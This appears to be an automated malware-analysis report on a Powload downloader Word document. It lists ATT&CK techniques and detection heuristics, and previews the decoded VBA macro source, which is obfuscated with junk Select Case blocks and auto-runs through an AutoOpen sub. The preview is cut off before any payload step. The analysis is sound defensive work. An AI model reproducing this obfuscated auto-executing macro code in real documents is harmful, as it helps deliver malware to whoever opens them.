Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro. Critical heuristics indicate the use of WMI to launch processes, suggesting the macro's purpose is to download and execute a second-stage payload. The ClamAV signature 'Doc.Downloader.Powload-6960273-0' further supports this downloader functionality.
Heuristics (7)
- ClamAV: Doc.Downloader.Powload-6960273-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Powload-6960273-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code.
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32065 bytes | f73112027860fe5fca28930e5d203244cff8e2656af8328846776d2dd90446f5 |

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "B9709010"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "q00_802"
Attribute VB_Base = "0{77182310-740A-414E-80EE-E83D27A71280}{F5F0B46C-E5EA-4447-9D4F-E2AC4EECBBC4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "O09395_9"
Attribute VB_Name = "h_502254"
Attribute VB_Name = "v7189_84"
Attribute VB_Name = "r367582"
Attribute VB_Base = "0{F87F796A-377C-44FA-9A96-7C793E31A635}{A2E0618C-EBE0-41BA-B1C2-7B5A8C6BB60D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "h3344615"
Function E73623_(I96323)
Select Case k68407
Case d6320145 = s66970 = Sgn(102729877)
Case L7404851 = K5363717
Case z50_3549 = Log(q3586337)
Case Z_25907 = CBool(45233673)
Case b49800 = 736218445
Case u48222_ = CDate(A145803)
End Select
Select Case M_8__7
Case A7520093 = j1612897 = Sgn(511370031)
Case M1_538 = C25508
Case U36911 = Log(X729_3)
Case A89669 = CBool(645030910)
Case H8848752 = 436938566
Case z62290 = CDate(b320945)
End Select
Select Case H335684
Case P_830_39 = I8548474 = Sgn(662961206)
Case o_22951 = W8975891
Case S779788 = Log(D_47946)
Case B172116 = CBool(447794048)
Case s_766430 = 164756141
Case a166892 = CDate(N_7319)
End Select
Set E73623_ = CVar(I96323)
Select Case E21629
Case m642331 = I691833 = Sgn(155114654)
Case S30230 = r6047681
Case N3722826 = Log(T00487)
Case w51304 = CBool(231084096)
Case t0347_6 = 901373701
Case N22_962 = CDate(j6810720)
End Select
Select Case o9323213
Case F917896 = z27595 = Sgn(605210303)
Case r8524081 = k141_19
Case d913__3 = Log(R69702)
Case D_53_8 = CBool(761839810)
Case J8175_6_ = 639514882
Case W522_586 = CDate(H389_9)
End Select
Select Case d87911
Case w4_67501 = r3640461 = Sgn(944130080)
Case M1758570 = b2557105
Case X28738 = Log(L4123_93)
Case v_4289 = CBool(305932791)
Case w44771 = 470830078
Case W_3_39 = CDate(t5_5849)
End Select
End Function
Sub autoopen()
Select Case k405191
Case r6_35_2 = c03_677_ = Sgn(916534472)
Case H15_154 = B89930
Case z625911 = Log(o04920)
Case N01_2_ = CBool(625810851)
Case m015878 = 269680093
Case C05_590 = CDate(S6_9_7_)
End Select
Select Case N50761_
Case p07_634 = U73805 = Sgn(849910045)
Case F6747988 = V13812
Case U9_91300 = Log(c65854)
Case o649491 = CBool(230841503)
Case J_2657 = 453655854
Case Q5569442 = CDate(k70965_)
End Select
Select Case Y53__44
Case d_559_68 = h078043 = Sgn(862515626)
Case F7_843 = p_96721
Case C83_48 = Log(j085786)
Case q__8179 = CBool(82421662)
Case k23571 = 327555382
Case m39043 = CDate(a133333)
End Select
Call Y_43773
Select Case r720820
Case E965044 = f3_23__ = Sgn(225592149)
Case c8_5860 = n2348996
Case l6206938 = Log(I05751)
Case Q0__88 = CBool(942660283)
Case s446555 = 758486682
Case o685923 = CDate(i8_71838)
End Select
Select Case N5069682
Case q602924 = j12581_ = Sgn(367343208)
Case h8601_ = s6698336
Case V219181_ = Log(I5920_60)
Case q24251_ = CBool(880933770)
Case I3_1_820 = 652576007
Case G969685_ = CDate(S3613904)
End Select
Select Case F423080
Case s6655563 = G499837 = Sgn(24500381)
Case S7463095 = X32750
Case t5_6930 = Log(Z6_3865)
Case K_3682 = CBool(282812111)
Case s3259332 = 895176855
Case r17_74__ = CDate(n9228_34)
End Select
End Sub
Attribute VB_Name = "f40_59"
Function Y_43773()
On Error Resume Next
Select Case d51302
Case Z3280838 = u02__663 = Sgn(675843114)
Case C0651748 = u062_1
Case T954858 = Log(Z78859_)
Case l491__4 = CBool(753268533)
Case j9_
... (truncated)